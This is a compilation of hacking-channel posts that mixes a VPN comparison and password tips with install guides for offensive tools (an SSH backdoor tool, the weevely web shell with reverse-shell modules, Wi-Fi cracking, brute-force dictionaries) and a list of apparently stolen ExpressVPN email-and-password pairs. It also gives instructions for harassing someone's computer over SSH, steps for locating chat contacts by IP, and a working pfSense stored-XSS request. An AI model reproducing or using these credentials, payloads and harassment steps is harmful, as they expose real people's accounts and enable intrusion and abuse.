▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Second, the difference in connection methods between SSL VPN and IPSec VPN
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In connection mode, SSL VPN and IPSec VPN are also very different. IPSec VPN was originally designed to provide site-to-site communication between various departments of an enterprise. As the enterprise expanded users to include remote access, they had to expand the standard of the IPSec protocol or modify the protocol implemented by the manufacturer.

2) IPSec VPN provides direct (non-proxy) access by creating a tunnel between the two sites to achieve transparent access to the entire network; once the tunnel is created, the user's PC is physically located in the corporate LAN. It requires hardware and software compatibility, and requires that both ends of the "tunnel" can only be software from the same vendor. With IPSec VPNs, enterprises have to specify the technology used at both ends of the "tunnel", but few companies can or are willing to force their partners or customers to also use this technology, which limits the application of establishing an enterprise extranet through IPSec VPN.

3) Compared with the traditional IPSec VPN, SSL allows enterprises to achieve more remote users to access in different locations, achieve more network resource access, and low requirements for client devices, thus reducing the cost of configuration and operation support. Many enterprise users adopt SSL VPN as the remote security access technology, and the main emphasis is on its convenient access capability.

4) SSL VPN provides enhanced remote security access functions. The access mode of IPSec VPN makes the user's PC as if it is physically in the corporate LAN. This brings a lot of security risks, especially when the access user authority is too large.

>SSL VPN provides a secure, proxyable connection, and only authenticated users can access resources, which is much safer. SSL VPN can subdivide the encrypted tunnel, so that end users can simultaneously access the Internet and access internal corporate network resources, that is to say,

5) SSL VPN is basically not restricted by access location, and can access network resources from numerous Internet access devices and any remote location. SSL VPN communication is based on the standard TCP / UDP protocol transmission, so it can traverse all NAT devices, proxy-based firewalls and status detection firewalls.

>This allows users to access from anywhere, whether behind a proxy-based firewall in another company's network or a broadband connection. IPSec VPN is difficult to implement in a slightly complicated network structure. In addition, SSL VPN can be accessed from manageable enterprise devices or non-managed devices, such as home PCs or public Internet access sites, while IPSec VPN clients can only be accessed from manageable or fixed devices.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Bypass Whatsapp image compression, create & send magic or malicious image without filtration...

🦑 Credit : Undercode Testing

https://www.youtube.com/watch?v=aFSbNwurJmQ&t=51s

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux Hacking 2020
t.me/undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/kuburan/txtool.git

2) cd txtool

3) apt install python2

4) ./install.py

6) txtool

7) for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:

$ apt-get install --assume-yes libsodium libsodium-dev

$ SODIUM_INSTALL=system pip2 install pynacl

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑updated A powerful and useful hacker dictionary builder for a brute-force attack
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone --depth=1 --branch=master https://www.github.com/landgrey/

2) pydictor.git

3) cd pydictor/

4) chmod +x pydictor.py

5) python pydictor.py

🦑 EXAMPLE USAGE :

type wordlist identifier description supported function
core base C1 basic wordlist F1 F2 F3 F4
core char C2 custom character wordlist F1 F2 F3 F4
core chunk C3 permutation and combination wordlist ALL
core conf C4 based on configuration file wordlist ALL
core extend C5 extend wordlist based on rules ALL
core sedb C6 social engineering wordlist ALL
tool combiner T1 combine the specify directory files tool
tool comparer T2 compare two file content difference tool ALL
tool counter T3 word frequency count tool ALL
tool handler T4 handle the input file tool ALL
tool uniqbiner T5 combine and unique the directory files tool ALL
tool uniqifer T6 unique the input file tool ALL
tool hybrider T7 hybrid couples word list tool F1 F2 F3 F4

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑A cross platform Python frequency scanning GUI for the OsmoSDR rtl-sdr library
pinterest.com/undercode_Testing

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Ubuntu

Press [CTRL][ALT][T] to open a command window and run the following command to install the libraries:

sudo apt-get install python python-wxgtk3.0 rtl-sdr

Install the software using:

sudo pip install -U rtlsdr_scanner

Now you should be able to run the program:

python -m rtlsdr_scanner

2) Windows

To see if it's working open a command prompt.

Then run:

rtl_test

You should see an output similar to this:

Found 1 device(s):
0: PROlectrix DV107669

Using device 0: PROlectrix DV107669
Found Fitipower FC0012 tuner
Supported gain values (5): -9.9 -4.0 7.1 17.9 19.2

Info: This tool will continuously read from the device, and report if
samples get lost. If you observe no further output, everything is fine.

Reading samples in async mode...
lost at least 12 bytes

If so your dongle and driver are now fully installed.

Potential Errors

'rtl_test' is not recognized as an internal or external command, operable program or batch file.
If you used the installer, first change to the installation directory, otherwise you're PATH hasn't been set properly, try step 2 again.
rtl_test reports 'No supported devices found.'
The driver has not been installed, try steps 3 to 7 again.
rtl_test keeps repeating 'lost at least'
Your machine may be too slow, try closing other programs and plug the dongle into a different USB port.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Weaponized web shell Termux :
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/epinna/weevely3

2) cd weevely3

3) run as python
weevely generate <password> <path>
weevely <URL> <password> [cmd]

🦑Module Description
:audit_filesystem Audit the file system for weak permissions.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess.
:audit_etcpasswd Read /etc/passwd with different techniques.
:audit_phpconf Audit PHP configuration.
:shell_sh Execute shell commands.
:shell_su Execute commands with su.
:shell_php Execute PHP commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:system_procs List running processes.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_gzip Compress or expand gzip files.
:file_clearlog Remove string from a file.
:file_check Get attributes and permissions of a file.
:file_upload Upload file to remote filesystem.
:file_webdownload Download an URL.
:file_tar Compress or expand tar archives.
:file_download Download file from remote filesystem.
:file_bzip2 Compress or expand bzip2 files.
:file_edit Edit remote file on a local editor.
:file_grep Print lines matching a pattern in multiple files.
:file_ls List directory content.
:file_cp Copy single file.
:file_rm Remove remote file.

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Complet termux wifi hacking tool
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

FEATURES :

1) WPS: The Offline Pixie-Dust attack

2) WPS: The Online Brute-Force PIN attack

3) WPA: The WPA Handshake Capture + offline crack.

4) WPA: The PMKID Hash Capture + offline crack.

5) WEP: Various known attacks against WEP, including fragmentation, chop-chop, aireplay, etc.

6) Run wifite, select your targets, and Wifite will automatically start trying to capture or crack the password.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/derv82/wifite2.git

2) cd wifite2

3) sudo ./Wifite.py

🦑To install onto your computer (so you can just run wifite from any terminal), run:

1) sudo python setup.py install
This will install wifite to /usr/sbin/wifite which should be in your terminal path.

Note: Uninstalling is not as easy. The only way to uninstall is to record the files installed by the above command and remove those files:

2) sudo python setup.py install --record files.txt \
&& cat files.txt | xargs sudo rm \
&& rm -f files.txt

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Termux - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
t.me/undercodeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


1) git clone https://github.com/Dionach/CMSmap
Then you need to configure the edbtype and edbpath settings in the cmsmap.conf. Use GIT if you have a local Git repository of Exploit-db :

2) [exploitdb]
edbtype = GIT
edbpath = /opt/exploitdb/

3) Alternatively, use APT if you have installed the debian exploitdb package. For Kali, use the following settings :

[exploitdb]
edbtype = APT
edbpath = /usr/share/exploitdb/

4) If you would like to run cmsmap from anywhere in your system you can install it with pip3 :

>cd CMSmap

>pip3 install .

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New acounts- Login With given Proxies Express Vpn Tested :
t.me/undercodeTesting



rodrigozepeda55@gmail.com:267165Rz, Account is Valid. Try logging in App to find out Status., Proxy: 113.166.121.42:4145

matt_lee88@hotmail.com:donkeytea88, Account is Valid. Try logging in App to find out Status., Proxy: 213.32.48.42:52576

ethanbco@gmail.com:hannah@68, Account is Valid. Try logging in App to find out Status.Proxy: 180.92.233.82:4145

mduboef@aol.com:zzzzzz10, Account is Valid. Try logging in App to find out Status. Proxy: 195.206.4.16:48006

grahamrgreenhill@gmail.com:4288Michelle!, Account is Valid. Try logging in App to find out Status. Proxy: 167.99.72.55:8080

stressedcorgi58@gmail.com:Sueshe123, Account is Valid. Try logging in App to find out Status., Proxy: 190.196.20.166:44907

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Premium Proxies _New :

195.158.109.248:50330 elite Apr-12, 10:25 Malta Valletta GO P.L.C.
187.188.182.107:43687 elite Apr-13, 01:23 Mexico Chetumal Iusacell
41.73.128.190:36226 elite Apr-12, 12:28 Nigeria Lagos IS InternetSolu...
217.64.109.231:45282 elite Apr-12, 22:21 Mali Bamako SOTELMA
41.217.219.53:31398 elite Apr-12, 04:12 Malawi Skyband Corpora...
41.217.217.60:36120 elite Apr-12, 22:17 Malawi Skyband Corpora...
41.87.29.130:8080 elite Apr-12, 19:11 Malawi Malawi Telecomm...
146.255.68.166:51329 elite Apr-13, 00:14 Macedonia Skopje Telesmart Telek...
94.242.213.33:8118 elite Apr-12, 10:10 Luxembourg root SA
92.114.234.206:46685 elite Apr-12, 22:27 Moldova, Republic of Chisinau Moldtelecom SA
202.131.234.142:51702 elite Apr-12, 12:10 Mongolia Mobinet LLC
202.179.7.182:56506 elite Apr-12, 19:09 Mongolia Mongolia Telecom
155.93.108.170:30348 elite Apr-12, 06:00 Nigeria Lagos
196.1.184.6:52963 elite Apr-13, 01:04 Nigeria Lagos Nigerian Teleco...
165.98.53.38:35332 elite Apr-12, 18:57 Nicaragua Centro De Admin...
114.134.172.50:60664 elite Apr-12, 19:08 New Zealand Auckland New Zealand Tec...
134.19.181.28:80 elite Apr-13, 00:37 Netherlands Hilversum Global Layer B.V.
202.166.207.195:8080 elite Apr-12, 21:24 Nepal Kathmandu SingNet Pte

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best 2020 Tempory Mail-No Login Required :
pinterest.com/undercode_Testing



http://www.20minutemail.com/

https://burnermail.io/

http://10minutemail.com/10MinuteMail/error.html

https://www.spamgourmet.com/index.pl

http://www.yopmail.com/en/

http://boun.cr/

https://tempmailo.com/

https://www.guerrillamail.com/

https://getnada.com/

http://temp-mail.org/

http://generator.email/

https://maildrop.cc/

http://www.e4ward.com/

http://www.throwawaymail.com/

http://mailinator.com/

https://mytemp.email/

https://tempemailco.com/

https://grouplist.io/

https://www.crazymailing.com/

https://mailtemp.top/

https://www.guerrillamail.com/

https://www.emailondeck.com/

https://ihazspam.ca/

http://www.fakemailgenerator.com/

https://10minutemail.net/

https://tempmail.io/

http://getairmail.com/

http://mailnull.com/


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ACCESS ANY PC VIA HACK SSH Full by Undercode :
What can I do on someone else’s PC using SSH ?
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

STEP1:
1) Configure Access and Launch Basic Applications
First you need to register a command so that everything we do appears on the remote computer that we logged in through SSH, and not on the local computer on which we logged in. Configure the display path with the following command:

export DISPLAY =: 0.0
Now, by writing a simple firefox command via SSH, you will open a Firefox browser window on the remote computer.

2) But for our first example, let's open the xterm window , displaying network data that looks pretty troubling for a beginner. To make the situation worse, we will do it 10 times. Accordingly, there will be 10 open windows.

4) To do this, we will execute the command in a loop:

for i in {1..10}; do sudo xterm -maximize -e sudo tcpdump; done
In this case, we open the terminal window of the maximum size, and the -e command means that we execute sudo tcpdump in the xterm window that we run.


Step 2 - Calling, Whistling and Speech

1) Before we can reproduce any noise, we need to execute the following command in order to be able to control the speakers remotely.

2) sudo modprobe pcspkr
Now we have many options! First, we can say any phrase through the computer using the say or espeak command .

> say "I am a canadian randomware, I have not encrypted any files but would appreciate some change"
espeak "please give me quarters sorry to bother you"
We can schedule such messages so that they periodically go to chrontab.

4) We can use the beep to drive the user crazy. To use beep , install it with > apt install beep .

🦑 After installation, look at the manual using man beep to evaluate its capabilities:

BEEP(1) General Commands Manual BEEP(1)

NAME
beep - beep the pc speaker any number of ways

SYNOPSIS
beep [--verbose | --debug] [-e device | --device device] [-f
N] [-l N] [-r N] [-d N] [-D N] [-s] [-c]

beep [ OPTIONS ] [-n] [--new] [ OPTIONS ]

beep [-h] [--help]

beep [-v] [-V] [--version]

🦑 We can generate almost any noise with Beep. The following table with frequencies may come in handy:

Note Frequency
C 261.6
C# 277.2
D 293.7
D# 311.1
E 329.6
F 349.2
F# 370.0
G 392.0
G# 415.3
A 440.0
A# 466.2
B 493.9
C 523.2

🦑Step 3 - Awesome Error Messages
Confusing or disturbing error messages is fun, as users usually trust them until they become too absurd. Such messages can be completely different.

> We can call small messages using the notify-send command , with the header and body of the message.

>notify-send 'WARNING' 'I AM CALLING THE INTERNET POLICE'
This message will pop up in the corner. Kinda boring. Instead, we can display a large bold alarm message with the whiptail command and run it in a full-screen window.

xterm -maximized -fullscreen -fa 'Monospace' -fs 19.31 -e whiptail --title "CRITICAL: ACTION CANNOT BE UNDONE" --msgbox "UNAUTHORIZED LOGIN! DATA SAFEGUARD SYSTEM WILL DESTROY THIS TERMINAL IN 10 SECONDS, STAY 30 FEET CLEAR TO AVOID BLAST" --topleft 23 79
You can replace it with your own message, this is how it will look.

Step 4 - Cron Tasks from Hell
Now we can start combining tasks and plan their automatic launch. We can check if there are any existing jobs in crontab with the -l flag, and then add a new job with the -e flag.

crontab -l
crontab -e
In the configuration window that opens, you can add a task for execution every 60 seconds according to the following formula.

* * * * * (your code here)
In order for the computer to beep every 60 seconds, we can add this record and then press ctrl x and y to save the file.

> hack any pc using ssh part 2>

* * * * * beep -f 300.7 -r 10 -d 50 -l 400
As soon as the file is saved, the computer will emit a sound signal with the given parameters every 60 seconds.

🦑 Step 5 - Completing Custom Tasks

1) If you have access to someone else’s computer using SSH, you can turn off any running process. This will lead to a sudden stop of the used application, and accordingly, the user will not be able to effectively use the computer. To find the process ID, we can use the top or htop commands . If you do not have htop installed , you can do this with the command below.

> apt install htop

🦑TASK :
1)
Tasks: 219 total, 1 running, 178 sleeping, 0 stopped, 0 zombie
%Cpu(s): 3.0 us, 0.4 sy, 0.0 ni, 95.6 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4968836 total, 1431244 free, 1104324 used, 2433268 buff/cache
KiB Swap: 5138428 total, 5138428 free, 0 used. 3367804 avail Mem

2) Take a random beep and combine it with some bash commands to create many Firefox browser windows that open every 60 seconds and go to “Never Gonna Give You Up.”

3) for i in {1..10}; do beep -f 4000 -D 500 -l 1000 -r 10 & firefox -new-window

USE FOR LEARN NOT FOR HARM

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Use the netstat command to quickly find the other party's IP address
> Use the built-in network command netstat in the Windows system to quickly find out the IP address of the friend of the other party. The specific operations are as follows:
fb.com/undercodeTesting


1) Click the <Start> button, execute the <Run> command in the pop-up shortcut menu, the <Run> dialog box pops up, enter the cmd command, and click the <OK> button to open the <Command Prompt> window. (I do n’t want to take screenshots when I turn on the computer lazily)


2) Find a xy friend or WeChat friend, open the chat window with them, and then send a picture to the other party.

3) At this time, enter the netstat -n command in the <Command Prompt> window and execute it. In the running result, you can see which addresses are currently connected to the local computer. If the status of a corresponding connection is ESTABLISHED, it indicates that the connection between the local computer and the opposite computer is successful, and the returned information is as follows.


4) as example after sending,
there are four successful connections. Among them, the host that opens the 80-port service is the QQ server, namely the two IP addresses 106.120.165.244 and 101.199.97.107.

5) Now, open a query website and query the IP address 106.120.165.244. You can see that the information of the other party has been successfully queried. The other IP address is exclusive to Qihoo after query. For example, positioning, recommending whatismyip is a smaller scope


🦑 Attachment: The netstat command is mainly used to display network connection information. It is a very useful tool for monitoring TCP / IP networks. It can let users know which network connections are currently in the system.

1) Enter netstat / in the <Command Prompt> window , You can get help information for this command.

-a or --all: display all connected sockets;

-A <network type> or-<network type>: list related addresses in the connection of this network type;

-c or --continuous: continuously list the network status;

-C or --cache: display the cache information of the router configuration;

-e or --extend: display other related information of the network;

-F or --fib: display FIB;

-g or --groups: display the list of group members with multiple broadcast functions;

-h or --help: online help;

-i or --interfaces: display the web interface information form;

-l or --listening: display the socket of the server under monitoring;

-M or --masquerade: display disguised network connection;



-n or --numeric: use the IP address directly without going through the domain name server;

-N or --netlink or --symbolic: display the symbolic connection name of the network hardware peripheral devices;

-o or --timers: display timer;

-p or --programs: display the program identification code and program name of the socket being used;

-r or --route: display Routing Table;

-s or --statistice: display network work information statistics table;

-t or --tcp: display the connection status of TCP transmission protocol;

-u or --udp: display the connection status of UDP transmission protocol;

-v or --verbose: display the command execution process;

-V or --version: display version information;

-w or --raw: display the connection status of RAW transfer protocol;

-x or --unix: The effect of this parameter is the same as specifying the "-A unix" parameter;

--ip or --inet: The effect of this parameter is the same as specifying the "-A inet" parameter.

2) Know how to lose the above command! ! ! It is netstat -n! ! !


🦑 Also! The command syntax information is as follows:

NETSTAT [-a] [-n] and so on

Do n’t do bad things for fun

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tracking
> Pseudo-hackers must know skills: query the other party's IP address and determine the true geographic location
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Preparation:

In order to query the other party's IP address and real geographic location, we need to use the " IP radar " software, which has: query which URLs you have visited, the IP address of its URLs, geographic location and website domain name, as well as access procedures, access Time, the number of bytes transferred, which programs are reading and writing your hard drive and other functions.

> Support system: WinXP / Win2003 / Vista / Win7 / Win8

🦑 Second, the query method:

1) After downloading the "IP Radar", directly decompress it and double-click to run.


2) After turning on the radar, make the "IP radar" in the running monitoring state, and then open the QQ chat window to chat with friends who want to obtain the IP address and real geographic location. Try to send the other party some large file messages such as pictures or music.

3) Then check in the "IP Radar" program, find the column where the "QQ.exe" program is located, and then double-click the column, it will open the "QQ.rxr" program to access the network details.

4) In the pop-up message box, you can find the other party's QQ IP address and geographic location information.

5) If you are afraid that the geographic location provided by "IP Radar" is not accurate enough, you can also directly enter the IP address into the search box of the search engine and click search to find the geographic location of the IP!

6) Get the download address of "IP Radar" , please search for " computer those things " in WeChat to follow our official public account, and reply to " IP Radar " to receive push messages!

Do n’t worry about computer freezes or problems. Pay attention to the WeChat public account of “ the computer ’s things ” (computer system, software application and other problems are all acceptable ) .

> This A simple process by tracking by app, will send more for ip tracking..

Written by Undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑I have too many account passwords, what should I do? Teach you to set a complex and memorable password
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The password is set to a universal, easy to remember, but often heard of "crash library" and other cases, breaking the password of a website, all network information is all transparent; password settings are complex and different, for a long time, I forget What password, every time you log in to retrieve the password will waste half a day. The problem of setting a password seems to be simple, but it somewhat troubles our daily life.

2) We do n’t have time to read through cryptography-related professional skills in order to set up a password, and we do n’t want to be easily obtained by those who have misconducted our network information. A simple trick can deal with it. In the process of setting a password, you will find that the combination of letters + numbers + symbols has a high security level, and generally requires 6 digits and more than 8 digits. Then we set the password best to think according to this standard.


🦑 1) The first step is to think of a set of basic codes. It can be a number, a spelling of a name, or an abbreviation of an aphorism, such as: every day upwards-corresponding to "TTXS" or lowercase "ttxs" or 4463 (stroke for each word),

2) The second step is to add a personality classification based on the basic code. For example, the account number related to finance is defined as: FINA or fa, and the definition of non-financial category is: Game, which can be defined by yourself.

3) The third step is to add tags for each website. For example, today's headline: can be identified as TT (the first letter of the headline)

4) Then combine these into a complex and memorable password rule: personality classification + basic code + website mark (location can be changed at will: basic code + personality classification + website mark ) For example: today ’s headline password is OK Set to: fa4463TT (accounts related to finance, the number of strokes every day, the first letter of the headline); the password of Weibo can be set to: Game4463wb (non-financial account, the number of strokes every day, the first of Weibo Abbreviations) We only need to remember our own coding rules.

5) The above method can set up different complex and regular easy-to-remember password series. Don't worry about your password being stolen on a computer or a small book, and don't be afraid that the "crash library" method can easily steal your password, and you don't have to waste time to retrieve the password frequently.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Verified bug by Undercode
> pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
t.me/undercodeTesting


# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr


# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.


POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d

🦑 __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save


🦑Please USE FOR LEARN NOT FOR STEAL »

@UNDERCODEOFFICIAL
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁